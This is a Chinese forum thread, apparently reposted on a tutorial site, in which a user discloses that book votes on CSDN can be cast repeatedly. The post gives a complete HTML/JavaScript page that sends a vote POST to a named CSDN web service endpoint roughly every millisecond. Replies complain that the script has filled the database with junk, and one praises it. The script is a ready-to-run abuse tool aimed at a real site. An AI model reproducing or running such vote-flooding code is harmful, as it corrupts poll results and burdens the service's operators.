首页 诗词 字典 板报 句子 名言 友答 励志 学校 网站地图
当前位置: 首页 > 教程频道 > JAVA > Java面试 >

公开一个CSDN漏洞,该如何解决

2012-01-09 
公开一个CSDN漏洞发现关于http://book.csdn.net/下的一些投票都可以重复投这个webservice很特别http://clu

公开一个CSDN漏洞
发现关于http://book.csdn.net/下的一些投票都可以重复投

这个web   service很特别
http://club.book.csdn.net/BookServer/bs.asmx

关于一个图书投票地址
http://club.book.csdn.net/people/mylist599.html

以下对上面地址刷票
<html>
<body   onload= "Timer_submit() ">
<script>
  function   Timer_submit()
  {
      Submit();
      window.setTimeout( "Timer_submit() ",1);
  }
  function   InitDataWs()
  {
        if(window.XMLHttpRequest)
        {
            szRequest=new   XMLHttpRequest();
            szRequest.overrideMimeType( "text/xml ");
        }
        else
        {
              szRequest=new   ActiveXObject( "Microsoft.XMLHTTP ");
        }
        szRequest.open( "POST ", "http://club.book.csdn.net/BookServer/bs.asmx/VoteDl ",true);
  }
  function   Submit()
  {
        InitDataWs();
        szRequest.setRequestHeader( "Content-Type ",   "application/x-www-form-urlencoded ");
        szRequest.send( "dlid=599&type=1 ");//dlid什么什么ID,   type=0   代表没用,type=1   代表有用
        szRequest=null;
  }
</script>
</body>
</html>
或许这不算是个漏洞,大家看一下

[解决办法]

我说 怎么数据库中这么多垃圾数据

都是你这个烂人用这种烂方法 作的烂攻击
[解决办法]
厉害
[解决办法]
AJAX

热点排行